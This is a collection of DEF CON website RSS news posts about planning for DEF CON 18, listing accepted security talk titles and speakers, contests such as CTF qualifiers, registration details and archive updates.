https://www.defcon.org/defconrss.xml Here's another twenty-four hot-n-fresh new DEF CON talks. Feast. Katana: Portable Multi-Boot Security Suite JP Dunning Exploitable Assumptions Workshop Joe "Crazy" Foley, Eric "Unlocked" Schmiedl, Zoz The Law of Laptop Search and Seizure Jennifer Granick, Kevin Bankston, Marcia Hofmann, Kurt Opsahl Advanced Format String Attacks Paul Haas Tales from the Crypto G. Mark Hardy Decoding reCAPTCHA Chad Houck 0box Analyzer: AfterDark Runtime Forensics for Automated Malware Analysis and Clustering Wayne Huang, Jeremy Chiu Hardware Hacking for Software Guys Dave King These Aren't the Permissions You're Looking For Anthony Lineberry, Tim Wyatt, David Richardson, Sr. Multiplayer Metasploit: Tag-Team Penetration and Information Gathering Ryan Linn App Attack: Surviving the Mobile Application Explosion Kevin Mahaffey, John Hering Searching for Malware: A Review of Attackers Use of Search Engines to Lure Victims Dave Maynor, Dr. Paul Q. Judge Getting Social with the Smart Grid Justin Morehouse, Tony Flick Electronic Weaponry or How to Rule the World While Shopping at Radio Shack Timothy "Mage" Otto WiMAX Hacking 2010 Pierce, Goldy, aSmig Industrial Cyber Security Wade Polk, Paul Malkewicz, J.Novak Improving Antivirus Scanner Accuracy with Hypervisor Based Analysis Danny Quist Search & Seizure & Golfballs Jim Rennie, Eric Rachner pyREtic - In-memory Reverse Engineering for Obfuscated Python Bytecode Rich Smith Stratagem 1 - Deceiving the Heavens to Cross the Sea Jayson E. Street Breaking WPA-TKIP: Decrypting All Traffic Mathy Vanhoef Go Go Gadget Python!: Introduction to Hardware Hacking Nick Waite, Furkan Cayci The Night The Lights Went Out In Vegas: Demystifying Smartmeter Networks Barrett Weisshaar, Garret Picchioni Panels PCI, Compromising Controls and Compromising Security Jack Daniel, Joshua Corman, Dave Shackleford, Anton Chuvakin, Martin McKeay, Alex Hutton, James Arlen Meet the EFF Kurt Opsahl, Eva Galperin, Kevin Bankston, Jennifer Granick, Marcia Hofmann,

==> Voting is Officially Open for the DEF CON 18 Artwork Contest!

https://www.defcon.org/defconrss.xml Here's what you do: go to the DEFCON 17 Artwork Contest Gallery on pics.defcon.org and pick your favorite. Then head on over here and vote in the poll! Good Luck to all the fantastic entries!

==> That's Right.. We're Posting More DC 18 Speakers...

https://www.defcon.org/defconrss.xml Here's a new list of speaker adds. You're probably not even finished absorbing the last one. That's just how we do. Deal with it. Mobile Privacy: Tor on the iPhone and Other Unusual Devices Marco Bonetti, sid77 Who Cares About IPv6? Sam Bowne masSEXploitation Michael Brooks Google Toolbar: The NARC Within Jeff Bryner WRT54-TM, Media Center and Network Sniffer John A. Colley IPv6: No Longer Optional John Curran Function Hooking for Mac OSX and Linux Joe Damato Breaking Bluetooth By Being Bored JP Dunning An Observatory for the SSLiverse Peter Eckersley, Jesse Burns How Unique Is Your Browser? Peter Eckersley Hacker Community (around) the Corporate World - Part II Luiz "effffn" Eduardo Be A Mentor! Marisa Fagen The Anatomy of Drug Testing Jimi Fiekert FOE The release of Feed Over Email, a Solution to Feed Controversial News to Censored Countries. Sho bleep Exploiting Digital Cameras Oren Isacson, Alfredo Ortega How I Met Your Girlfriend Samy Kamkar Bypassing Smart-card Authentication and Blocking Debiting: Vulnerabilities in Atmel Cryptomemory-based Stored-value Systems Jonathan Lee, Neil Pahl We Don't Need No Stinkin' Badges: Hacking Electronic Door Access Controllers Shawn Merdinger Letting the Air Out of Tire Pressure Monitoring Systems Mike Metzger Open Source Framework for Advanced Intrusion Detection Solutions Patrick Mullen, Ryan Pentney Antique Exploitation (aka Terminator 3: Point One One for Workgroups) Jon Oberheide Build Your Own Security Operations Center for Little or No Money Josh Pyorre Operating System Fingerprinting for Virtual Machines Nguyen Anh Quynh Lord of the Bing: Taking Back Search Engine Hacking from Google and Bing Rob Ragan, Francis Brown Social Networking Special Ops: Extending Data Visualization Tools for Faster Pwnage The Suggmeister Getting Root: Remote Viewing, Non-local Consciousness, Big Picture Hacking, and Knowing Who You Are Richard Thieme INSECURITY ENGINEERING OF PHYSICAL SECURITY SYSTEMS: Locks, Lies, and Videotape Marc Weber Tobias, Tobias Bluzmanis, Matt Fiddler Build your own UAV 2.0 - Wireless Mayhem from the Heavens! Michael Weigand, Renderman, Mike Kershaw Crawling BitTorrent DHTs for Fun and Profit Scott Wolchok

==> More Speakers Added to the DEF CON website!

https://www.defcon.org/defconrss.xml DC 18 is getting close and we've added another batch of speakers. Keep tabs on the DEF CON 18 speakers page as we finalize the list. WPA Too! Md Sohail Ahmad Evilgrade, "You Still Have Pending Upgrades?" Francisco Amato Exploitation on ARM - Technique and Bypassing Defense Mechanism Itzhak "Zuk" Avraham Resilient Botnet Command and Control with Tor Dennis Brown Open Public Sensors and Trend Monitoring Daniel Burroughs Bad Memories Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt Kartograph : Finding a Needle in a Haystack or How to Apply Reverse Engineering Techniques to Cheat at Video Games. Elie Bursztein, Jocelyn Lagarenne, Dan Boneh Token Kidnapping's Revenge Cesar Cerrudo Hacking Facebook Privacy Chris Conley Physical Security : You're Doing It Wrong! A.P. Delchi Hacking with Hardware: Introducing the Universal RF Usb Keyboard Emulation Device - URFUKED Monta Elkins Trolling Reverse-Engineers with Math: Ness... It hurts... frank^2 Mastering the Nmap Scripting Engine Fyodor, David Fifield Live Fire Exercise: Baltic Cyber Shield 2010 Kenneth Geers Making the DEFCON 18 Badge Joe "Kingpin" Grand Legal Developments in Hardware Hacking Jennifer Granick, Matt Zimmerman How To Get Your FBI File (and Other Information You Want From the Federal Government) Marcia Hofmann The Chinese Cyber Army - An Archaeological Study from 2001 to 201 Wayne Huang, Jack Yu Ripping Media Off Of the Wire HONEY Malware Migrating to Gaming Consoles: Embedded Devices, an AntiVirus-free Safe Hideout for Malware Ahn Ki-Chan, Ha Dong-Joo Training the Next Generation of Hardware Hackers -- Teaching Computer Organization and Assembly Language Hands-on with Embedded Systems Andrew Kongs, Dr. Gerald Kane ChaosVPN for playing CTFs mc.fly, vyrus, ryd FPGA Bitstream Reverse Engineering Lang Nguyen Kim Jong-il and Me: How to Build a Cyber Army to Defeat the U.S. Charlie Miller Big Brother on the Big Screen: Fact/Fiction? Nicole Ozer, Kevin Bankston Practical Cellphone Spying Chris Paget Extreme-range RFID Tracking Chris Paget My Life As A Spyware Developer Garry Pejski Implementing IPv6 at ARIN Matt Ryanczak Exploiting WebSphere Application Server's JSP Engine Ed Schaller Gaming in the Glass Safe - Games, DRM & Privacy Ferdinand Schober You're Stealing It Wrong! 30 Years of Inter-Pirate Battles Jason Scott Browser Based Defenses James Shewmaker Drivesploit: Circumventing Both Automated AND Manual Drive-by-Download Detection Caleb Sima, Wayne Huang Your ISP and the Government: Best Friends Forever. Christopher Soghoian Weaponizing Lady GaGa, Psychosonic Attacks Brad Smith From "No Way" to 0-day: Weaponizing the Unweaponizable Joshua Wise Pwned By The Owner: What Happens When You Steal A Hacker's Computer Zoz

==> DEF CON 18 Contest Madness!

https://www.defcon.org/defconrss.xml Over the past week or two, we've had a flood of announcements for new contests! Check them out below! Dark Tangent's Tamper Evident Contest There are various tamper evident technologies out there, including tape, seals, locks, tags, and bags, to name a few. This contest will test your ability to perform "defeats" (Described below) against a range of inexpensive commercial low to medium security products. Backdoor Hiding Contest Two in one Backdoor Hiding/Finding Contest (participate in either or both): In the first stage, hiding participants provide a source code hiding a backdoor, in the second stage organizers mix the source codes with non-backdoored (placebos), and then ask finding participants to spot the placebos. Hiding participants get hiding points for being voted as a placebo and finding participants get points for spotting the placebos and negative points for false positives. KoreLogic's "Crack Me If You Can" Contest As a part of an authorized penetration test of a large corporate network, you have captured a large number of password hashes. The hashes are from Active Directory, UNIX systems, LDAP servers, routers, etc. As part of your analysis, your client has asked for password complexity statistics, what their users are doing right and/or wrong related to generating passwords, and identification of weak passwords. You only have 48 hours to complete this effort.

==> CTF Quals Official Results!

https://www.defcon.org/defconrss.xml Congratulations to the qualifying teams for DEF CON Capture the Flag 2010! Official Quals info is live on ddtek.biz, so check it out for standings, correct and submitted answers by team and much more! Qualified teams: 1. VedaGodz (CONFIRMED!) 2. European Nopsled Team (CONFIRMED!) 3. TwoSixNine (CONFIRMED!) X. Uberminers (deadline expired) 4. lollersk8erz (CONFIRMED!) 5. GoN (CONFIRMED!) 6. painsec (CONFIRMED!) 7. ACME Pharm (CONFIRMED!) 8. Routards (CONFIRMED!) X. Nibbles (CAN'T PARTICIPATE) 9. shellphish (CONFIRMED!) 10. teambfe (CONFIRMED!) alt. Plaid Parliament of Pwning (CONFIRMED!) X. int3pid pandas (CAN'T PARTICIPATE) alt. HackerDom (CONFIRMED!)

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the new Speaker's Corner by Shawn Moyer entitled "Kill Yr Idols"!

==> CFP Closes, More Talks Posted!

https://www.defcon.org/defconrss.xml Here's another great batch of talks for DEF CON 18! Stay tuned, we got tons of last minute submissions, so there's a bunch more coming down the pipe in the next couple of weeks! Internet Wars Panel More info to come. Cyber[Crime|War] Charting Dangerous Waters Iftach Ian Amit Seccubus - Analyzing Vulnerability Assessment Data the Easy Way... Frank Breedijk Exploiting SCADA Systems Jeremy Brown Katana: Portable Multi-Boot Security Suite JP Dunning Making the DEF CON 18 Badge. Joe "Kingpin" Grand How to Hack Millions of Routers Craig Heffner Powershell...omfg David Kennedy (ReL1K) and Josh Kelley (Winfang) Like a Boss: Attacking JBoss Tyler Krpata Blitzableiter - the Release Felix "FX" Lindner Changing Threats To Privacy: From TIA To Google Moxie Marlinspike Attacking .NET Programs at Runtime Jon McCoy Securing MMOs: A Security Professional's View From the Inside metr0 Wardriving the Smart Grid: Practical Approaches to Attacking Utility Packet Radios Shawn Moyer and Nathan Keltner The Games We Play Brandon Nesbit ExploitSpotting: Locating Vulnerabilities Out of Vendor Patches Automatically Jeongwook Oh Sniper Forensics - One Shot, One Kill Christopher E. Pogue A.K.A "Big Poppa ReverShell" Toolsmithing an IDA Bridge, Case Study For Building a Reverse Engineering Tool Adam Pridgen A New Approach to Forensic Methodology - !!BUSTED!! Case Studies David C. Smith and Samuel Petreski Web Application Fingerprinting with Static Files Patrick Thomas VirGraff101: An Introduction to Virtual Graffiti Tottenkoph An Examination of the Adequacy of the Laws Related to Cyber Warfare Dondi "SpookDoctor06" West

==> Reg Open For Social Engineering Contest!

https://www.defcon.org/defconrss.xml The folks at social-engineer.org have taken the reins of the DEF CON 18 Social Engineering Contest, and Registration is Open! This promises to be an exciting addition to this year's DEF CON, and has some pretty cool prizes, including an iPad and a spot on the Social Engineer Podcast for 1st place. Check out the contest description and official rules at http://www.social-engineer.org/blog/defcon-social-engineering-contest/.

==> DEF CON 18 CFP Closing Soon!

https://www.defcon.org/defconrss.xml Only a few more days to submit your CFP to speak at DEF CON 18! Call for Papers will officially close Tuesday June 1, so get those submissions in to share your cutting edge hacking research with the world! Check out the official announcement for details, and then fill out the Call for Papers Form.

==> New on defcon.org: CTF Archive and Speaker's Corner!

https://www.defcon.org/defconrss.xml We've got a couple of new sections on defcon.org, the first of which is the Capture The Flag Archive, a page dedicated to collecting accounts, walkthroughs and other resources of Capture the Flag at DEF CON over the years, not only for history's sake but so the uninformed and/or interested can better grasp the epic journey that teams must face on the road to DEF CON CTF victory! We just collected a bunch of the walkthroughs, video, and write-ups from this past weekend's CTF Quals so check it out! The second new section of defcon.org is called Speaker's Corner, where we will be posting short stories, talk teasers, technical info and words of wisdom from our DEF CON speakers past & present. The first post is by DEF CON 17 Speaker Jayson E. Street, and is entitled "Trying to Be a Wise Man at DEF CON", and thanks to Jayson for being the first to jump onboard! We hope you enjoy these new additions to the site and will help them to grow and be useful to all!

==> Minibosses at theSummit

https://www.defcon.org/defconrss.xml For immediate release: MiniBosses (http://www.minibosses.com/) have signed on as an official act to perform at theSummit on Thursday July 28th during DEF CON. They are the second act to confirm a performance spot at this year's Fundraiser. At ShmooCon in February, DualCore announced that they will return again for this year's event for the 4th consecutive year and 3rd year as the headlining act. Follow Us on Twitter for Event and Feature Guest Updates: www.twitter.com/effsummit Coming to the event? Make your presence known on the Facebook Event Page: http://www.facebook.com/event.php?eid=112161832149640 About Mini Bosses: Four mid-20's guys from Phoenix got together for one common cause... Recreate the NES hits you all know and love in real-time on stage for everyone's enjoyment pleasure. They consider all Bossies to be their groupies from the coasts of Tokyo to the midlands of Michigan. If you're into 8-bit power chords, get ready to ride the midi wave of Awesome! About EFF: Blending the expertise of lawyers, policy analysts, activists, and technologists, EFF achieves significant victories on behalf of consumers and the general public. EFF fights for freedom primarily in the courts, bringing and defending lawsuits even when that means taking on the US government or large corporations. About Vegas 2.0: A transient, a local or a weekend Vegas Warrior, however you peg us, we are THE Las Vegas InfoSec group. Our members are long time DEF CON and Computer Security Industry avant-garde. When we are not planning theSummit, we spend our free cycles conjuring up Social Engineering, Web and Windows attacks. We are always looking for new locals to Las Vegas OR frequent visitors to stop by our labs conveniently located in North Las Vegas for a beer and some InfoSec foo!

==> Contest & CFP Action Required!

https://www.defcon.org/defconrss.xml The vortex is swirling, folks. There's a sense of urgency in the air, you can't quite put your finger on it, but it's beginning to make you a little nervous and a little excited. Can you feel it nagging the back of your mind? That little voice saying, ever so quietly, "Less than 2 weeks left to submit a talk!", and "CTF Quals reg ends tomorrow!". Or maybe you hear, "write a short story", "Figure out LosT's puzzles" or "enter the Art Contest". That voice is actually us reminding you that all of these things are coming up or going on within the next two days to three weeks. So if you want to participate, you better get moving! Keep up on current events, as always, on the DEF CON Twitter, DEF CON Facebook, DEF CON RSS Feed and here on defcon.org!

==> DEF CON 18 Artwork Contest is Open!

https://www.defcon.org/defconrss.xml It's time again, my creative friends, for another year of the DEF CON Artwork Contest! Get out your GIMP or Windows Movie Maker and give a shot at making some awesome DEF CON Artwork! This year we're putting the art contest back in the digital realm. There will be three types of entries, none of which are the standard shirt, sticker, poster designs of the past. This time around we want you to think about themes, desktop wallpapers and animation/motion graphics. You may draw inspiration from past DEF CON art or go in a whole new direction. Check out all the rules at: https://forum.defcon.org/showthread.php?t=11342

==> More DEF CON 18 Speakers!

https://www.defcon.org/defconrss.xml Here's another fresh batch of delicious Speaker goodness for you! Enjoy! Exploiting Internet Surveillance Systems Decius The Search for Perfect Handcuffs... and the Perfect Handcuff Key Deviant Ollam Jackpotting Automated Teller Machines Redux Barnaby Jack The Power of Chinese Security Anthony Lai, Jake Appelbaum and Jon Oberheide Repelling the Wily Insider Matias Madou and Jacob West You Spent All That Money And You Still Got Owned... Joseph McCray Cyberterrorism and the Security of the National Drinking Water Infrastructure John McNabb HD Voice - The Overdue Revolution Doug Mohney DEF CON Security Jam III: Now in 3-D? David Mortman, Rich Mogull, Chris Hoff, Rsnake, Dave Maynor, and Larry Pesce "This Needs To Be Fixed" and Other Jokes In Commit Statements Bruce Potter and Logan Lodge Airport Body Scanners and Possible Countermeasures Paul F. Renda Injecting Electromagnetic Pulses Into The Electric Grid Paul F. Renda SHODAN for Penetration Testers Michael "theprez98" Schearer SMART Project: Applying Reliability Metrics to Security Vulnerabilities Blake Self, Wayne Zage and Dolores Zage Hacking Oracle From Web Apps Sumit "sid" Siddharth So Many Ways to Slap A Yo-bleep:: Xploiting Yoville and Facebook for Fun and Profit strace Attack the Key, Own the Lock Schuyler Towne and datagram Balancing the Pwn Trade Deficit Valsmith, Owner, Colin Ames and Anthony Lai Keep your eyes on the DEF CON 18 Speakers Page and the DEF CON Twitter for new speaker announcements!

==> DEF CON 18 Speakers Posted!

https://www.defcon.org/defconrss.xml Here we go! Here is the first of many batches of DEF CON 18 talks to be posted! Expect more early in the week! FOCA2: The FOCA strikes back Chema Alonso and José Palazón "Palako" Connection String Parameter Attacks Chema Alonso and José Palazón "Palako" SCADA and ICS for Security Experts: How to avoid cyberdouchery James Arlen Web Services We Just Don't Need Mike "mckt" Bailey Our Instrumented Lives: Sensors, Sensors, Everywhere... Greg Conti Cloud Computing, a weapon of mass destruction? David "VideoMan" M. N. Bryan The keys to running a successful DEF CON Group by DC612 David "VideoMan" M. N. Bryan and Jared Bird Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device Adrian Crenshaw Constricting the Web: Offensive Python for Web Hackers Nathan Hamiel and Marcin Wielgoszewski Hardware Black Magic: Designing Printed Circuit Boards Dr. Fouad Kiamilev, Corey 'c0re' Lange and Stephen 'afterburn' Janansky DCFluX in: Moon-bouncer Matt "DCFluX" Krick Air Traffic Control Insecurity 2.0 Righter Kunkel "This is not the droid you're looking for..." Nicholas J. Percoco and Christian Papathanasiou Malware Freak Show 2: The Client-Side Boogaloo Nicholas J. Percoco and Jibran Ilyas Build a Lie Detector/Beat a Lie Detector Rain and j03b34r Keep your eyes on the DEF CON 18 Speakers Page and the DEF CON Twitter for new speaker announcements!

==> New DEF CON 18 Site!

https://www.defcon.org/defconrss.xml Check out the new site for DEF CON 18! It's got the most basic info for now, so keep your eyes peeled as all of the great talks, contests and events solidify! You can expect the first round of accepted speakers to be posted very soon! We're also working on a page to guide those new to DEF CON where to look for pertinent information. You will be able to find all of the scheduling and entertainment info here as well as it becomes available, so be sure to follow us on the Twitter or Facebook feeds to stay up to the minute as we post new data! Wander around, get familiar, and be sure to check back for frequent updates to the madness that is DEF CON 18!

==> DEF CON 18 Updates

https://www.defcon.org/defconrss.xml Do you hear it? The whir of the gears of DEF CON planning reaching operating speed? All around us events are springing into action! HighWiz has stated his intention to bring back DC101, a primer for those new to attending DEF CON. Not many details yet, but you can stay tuned to DC101 on the DEF CON Forums to stay up to date with details as they become available! We've also noticed that The Summit will be back this year, hosted by Vegas 2.0 to benefit the EFF! You can find details on the Summit Facebook page! We also can't fail to mention recent activity on LosT's Mystery Challenge. He says it's going to be the last year, so you better pay attention if you want to participate! You can follow the Mystery Challenge Forum and the Official Mystery Challenge Site at ten-five-seven.org. There is also a new forums based contest, called "What's in Neil's Pants", wherein Nikita asks a trivia question every week for the chance to win fabulous prizes from the things Neil leaves in his many pockets when he throws his pants in the hamper. You can also look for the DEF CON 18 Website to launch by the end of the month with an announcement for the DEF CON 18 Artwork Contest to be released in early May! As always, keep your eyes trained on the DEF CON Twitter for Updates as they occur!

==> New DEF CON 18 Short Story Contest!

https://www.defcon.org/defconrss.xml This contest is new this year and we are hoping it goes over well. Lots of you out there are avid writers and some just have an incredible imagination that when put to paper it blows your mind. Speaking from several years of reviewing white papers and slide decks, you guys are hilarious. We'd like to see your flair for creative writing put to another use and reward you for a (*cough*troll*Cough*) job well done. Good Luck! Check out all the details on the Short Story Contest Forum

==> EFF Proudly Presents the First Annual Defcon Getaway Fundraising Contest!

https://www.defcon.org/defconrss.xml From EFF.org: As the winter snows begin to melt, revealing a landscape full of promise and hope, a hacker's thoughts turn to flights of fancy: specifically, the thought of being in Las Vegas during the last weekend in July. If you're one of those hackers and you love digital freedom, EFF would like your help spreading the word about our efforts to protect and defend coders' rights by encouraging your friends and neighbors to join you in supporting us. In return, EFF wants to help the best EFFvangelists enjoy Defcon 18 in style! Read more...

==> DEF CON 18 Event/Contest Update!

https://www.defcon.org/defconrss.xml Contest and event planning is starting to heat up! A few more have surfaced and some others have begun conversation! Check out your favorite DEF CON Contest or Event link below for more info! 10,000¢ Hacker Pyramid: Call for Help Artwork Contest: Coming in May Badge Hacking Contest: Forum Active Be The Match Foundation - Bone Marrow Drive: NEW! Forum Active Beverage Cooling Contraption Contest: Forum Active Cannonball Run: Forum Active Capture the Flag: Quals Announced DEF CON Shoot: Forum Active Geo Challenge: Forum Active Social Engineering Contest: No Posts Goon Band — Recognize: Forum Active Forum Meet: Forum Active Hacker Jeopardy: Forum Active Hacker Karaoke: Forum Active Hardware Hacking Village: Forum Active Lockpicking Contests: Forum Active Mystery Challenge: Forum Active Official DEF CON DJs, Music, and Events: Call for DJS, Forum Active Open CTF: New Organizers, Forum Active QueerCon: No Posts Scavenger Hunt: Forum Active Spot the Fed:Forum Active Keep your eyes on the DEF CON Twitter, DEF CON Facebook, DEF CON RSS Feed and defcon.org for updates!

==> DEF CON 18 CTF Quals Announced!

https://www.defcon.org/defconrss.xml From the DEF CON Forums: FOR IMMEDIATE RELEASE 1 APRIL 2010 DEFCON CTF QUALIFIER ANNOUNCED Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFCON 18 CTF. Stock up on Red Bull, put the pizza delivery on speed dial, polish up your fancy shellcodes, and replenish the duct tape supply. The competition for these coveted spots will be held over 55 non-stop hours 21-24 May. When the dust clears only the 10 best will be invited to join us this summer in sin city for the annual DEFCON deathmatch. In historical fashion VedaGodz will automatically be permitted contest entry. However, we wish to point out that real ninjas would still attempt to qualify. The qualification round will again be in the style of game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking across a vast realm of security. This isn't CTF like your mama used to make. Level 1 questions make CISSPs turn red, Level 2 make SANS Fellows cry in frustration, Level 3 are typically only answerable by sheep of above average barnyard intelligence, you get the idea. Pause your atari emulator and hop over to ddtek.biz to register. Only those that pre-register are permitted to play. Registration site: http://ddtek.biz/register.html Registration opens: 01 Apr 2010 00:00:00 UTC Registration ends: 20 May 2010 00:00:00 UTC Qualifications open: 21 May 2010 19:00:00 UTC Qualifications ends: 24 May 2010 02:00:00 UTC More information will follow via your registered email address. Those with SANS certs need not apply. CISSPs are right out.* Vulc@n Difensiva Senior Engineer Diuntinus Defense Technologies, Inc.

==> DEF CON 18 Open CTF: DC949 Passes the Torch

https://www.defcon.org/defconrss.xml DC949, the creators of the Open CTF Contest (formerly Amateur CTF), after five long years have decided to step down as organizers. DEF CON would like to thank them for all of their hard work over the last five years in making a contest that was not only fun, but also open to all who'd like to test the waters of Capture the Flag type competition. They have passed the torch to a team that has competed in their contest many times, TubeWarriors. Welcome TubeWarriors, we wish you luck! You can read more in the Open CTF thread on the DEF CON Forums, as well as DC949's Farewell Thread.

==> DEFCON 18 Badge Call-for-Integration

https://www.defcon.org/defconrss.xml With the electronic DEFCON badge now in its fifth incarnation, we've decided to try something different. We're opening our kimono (just slightly) for DEFCON attendees, groups, villages, or contest organizers who want to integrate some piece of information or hide some piece of data in the badge to help further their cause during the con. For example, maybe your contest wants to hide a clue on the badge and then contestants have to find it in the code or press a certain button to reveal it... Read more on the DEF CON Forums. Submissions are due by April 1, 2010.

==> Be The Match Foundation - Bone Marrow Drive @ DEF CON 18

https://www.defcon.org/defconrss.xml As some of you may know, one of our speakers, Thomas Wilhelm, was recently a bone marrow donor from the Be the Match program. He contacted us about setting up a registry drive at Defcon 18. We like that idea and are going to do what we can to make sure they have the space they need in order to grow their donor registry. You can read more on the DEF CON Forums, and keep your eye on that forum for further details as they develop.

==> Want To Be A DJ or Band At DEF CON 18?

https://www.defcon.org/defconrss.xml The Artist Bookings for DEF CON 18 Bands and DJs are currently open! If you are a DJ or a Band that would like to play at the Black and White bleep, by the Pool, in the Chill Out area, or various other DEF CON events, now is the time to submit your application! DJ Great Scott will be accepting submissions up until May 3rd, 11:59pm (23:59) CST (US CENTRAL). You can find his post announcing this on the DEF CON Forums and fill out the application form. Good Luck!

==> Pics from DEF CON 17 on Facebook!

https://www.defcon.org/defconrss.xml Head on over to the Official DEF CON Facebook Fan Page and if you're not already, become a fan! We've uploaded pictures taken by the official DEF CON 17 photographer, ETA. Also some pics from Nikita, Dark Tangent, and other Goons who sent them to us. While you're there, start a discussion or leave us a comment, and let us know where your DEF CON pics are!

==> Book your room for DEF CON 18!

https://www.defcon.org/defconrss.xml Get your room for DEF CON 18 booked early on the Riviera Reservation page for DEF CON 18! Rates are $99/night for the first two people! Additional fees may apply for more than 2 people per room.

==> DEF CON 18 Call for Papers is Open!

https://www.defcon.org/defconrss.xml More exciting than the latest 0-day in Acrobat or Internet Exploder, it's time for the DEF CON CFP to open! Check out the DEF CON 18 CFP Announcement for all the details!

==> Confirmed Contest and Events for DEF CON 18!

https://www.defcon.org/defconrss.xml The following Contests and Events have announced their intention to return for DEF CON 18! The ones that already have post activity are marked below. If you have an idea for a new contest or event, you can check out the New Ideas forum and see what kind of response you get! 10,000¢ Hacker Pyramid: No Posts Artwork Contest: No Posts Badge Hacking Contest: No Posts Beverage Cooling Contraption Contest: Forum Active Cannonball Run: No Posts Capture the Flag: No Posts DEF CON Shoot: Forum Active Geo Challenge: No Posts Social Engineering Contest: No Posts Hacker Jeopardy: Forum Active Hacker Karaoke: No Posts Hardware Hacking Village: Forum Active Lockpicking Contests: Forum Active Mystery Challenge: No Posts Official DEF CON DJs, Music, and Events: Call for DJS, Forum Active QueerCon: No Posts Scavenger Hunt: No Posts Spot the Fed:Forum Active We'll post updates as they happen on the DEF CON Twitter, DEF CON RSS Feed and here on the site!

==> DEF CON Archives Complete!

https://www.defcon.org/defconrss.xml DEF CON 9-11 music is now live, with RSS feeds for each. This completes the conversion of the DEF CON Archives for your enjoyment! You can find the RSS feeds at: DEF CON 10 https://www.defcon.org/podcast/defcon-9-music.rss https://www.defcon.org/podcast/defcon-10-music.rss https://www.defcon.org/podcast/defcon-11-music.rss

==> DEF CON 17 Merch at J!NX

https://www.defcon.org/defconrss.xml Was the swag line at the show too long for you? Just didn't get a chance to pick up a shirt? You can now find all of the remaining DEF CON 17 Merchandise at J!NX! There's even some shirts left over from DEF CON 16, Check it out!

==> DEF CON Archives Nearing Completion!

https://www.defcon.org/defconrss.xml DEF CON 10 and 11 presentation audio and video are now converted and live on their respective archives pages, and we have also posted RSS feeds for each. This makes the presentation archives complete! All that remains is to finish the DEF CON 9-11 Music RSS feeds, and the archives will be whole and up to date! You can find the RSS feeds at: DEF CON 10 https://www.defcon.org/podcast/defcon-10-audio.rss https://www.defcon.org/podcast/defcon-10-video.rss DEF CON 11 https://www.defcon.org/podcast/defcon-11-audio.rss https://www.defcon.org/podcast/defcon-11-video.rss Or check out the DEF CON Media Archives Page! Updates will be posted here on defcon.org, media.defcon.org, and the DEF CON Twitter, so keep watch!

==> Pricing for DEF CON 18

https://www.defcon.org/defconrss.xml As the CPU cycles of DEF CON 18 Planning begin to rise toward 100%, we wanted to inform you that the price of admission will be rising slightly for DEF CON 18 to $140 USD due to price increases in the cost of doing business in Las Vegas and Washington State. The economy is in a slump, but don't tell the tax crazy cities that! I can't afford that, you say? You could offset this modest bump in price if you were to save an extra 10 per day from now until con. That's what, one can of Jolt Cola per week? For almost four days of some of the most groundbreaking talks, contests, events and hacker social funtime around? Check the newspaper coin returns, look under your couch cushions, keep your eyes on the ground for change! You'll find that extra $20, and it'll be worth it! We are planning to make DEF CON bigger and better than previous years, with a new "No Drama Badge™" to keep you out of lines and in action. So keep watch on defcon.org and the DEF CON Twitter for news of the surprises we have in store!

==> Happy New Year from DEF CON!

https://www.defcon.org/defconrss.xml As 2009 fades away into the memory back ups, we'd like to wish you all happy hacking in 2010! At DEF CON World Domination HQ, we are wrapping up the last of the archiving and moving to get into DEF CON 18. We have some new surprises in development to make this year's show even better. So stay tuned to the DEF CON RSS Feed and the DEF CON Twitter for the latest updates as we release past content and announce new events and contests! We'll be opening the DC 18 Call for Papers some time in February, and now is a great time to start thinking about new ideas you may have for DEF CON 18. You can follow and participate in the Planning and New Ideas sections of the DEF CON Forums. Happy New year to all from the DEF CON Team!

==> DEF CON Archives Pages Up and Running!

https://www.defcon.org/defconrss.xml Gone are the days of the 10 mile deep DEF CON archives page! The new and improved archives pages for DEF CON 1-10 are now all up and running to match the 11-17 archives posted earlier this year. There is still a bit of audio left to transcode, and a few more RSS feeds coming, so keep your eyes on the archives and our twitter feed for those developments as they occur. You can also check out media.defcon.org for the list of the most current updates to the media from past shows.

==> DEF CON HQ Update

https://www.defcon.org/defconrss.xml Hey Hackers, we just wanted to let you know what's going on here at DEF CON World Domination HQ! DT, Nikita and myself are grinding away at the DEF CON Archives working on the bestest New Year's gift ever, filling in the gaps and re-encoding all of the content from all of the past cons! We're also making audio and video RSS feeds for years that don't have them, and trying to pull some SEO magic to make everything ultimately more findable. SO, keep your eyes on the DEF CON Archives for all of the great stuff from the past 17 years that you forgot you wanted to know. If you don't already follow, the DEF CON Twitter feed is a great place to get the freshest announcements on what we are doing! By the way, the buzz for DEF CON 18 is already humming on the DEF CON Forums, and a few of the contests have planning threads and announcements open. Now is a great time to start thinking about new ideas that you might want to propose for this year's DEF CON, so post them there if you've got a great new idea!

==> Dark Tangent to Keynote Virtual Event

https://www.defcon.org/defconrss.xml Jeff Moss (Dark Tangent) to keynote Black Hat/Dark Reading virtual event December 9th. Visit https://www.blackhat.com/html/virtual2009/virtual2009-home.html for info.

==> Early Christmas! DEF CON 17 Video and Audio Now Online!

https://www.defcon.org/defconrss.xml That's right kids! Whether you've been naughty or nice, all of the audio and video from DEF CON 17 is now available for download! You can get it by heading to the DEF CON 17 Archive Page, and check out all of the awesome talks you want. You can also get them straight from the iTunes store or from the following RSS Feeds: * Speaker & Slides contains video of the speaker and their slides. * Slides contains video of the slides with speaker audio. * Audio for those who just want to listen. We're also considering posting them soon for one massive download over torrent and peer to peer, so stay tuned, and enjoy!!

==> Re-encoded Past DEFCON Content!

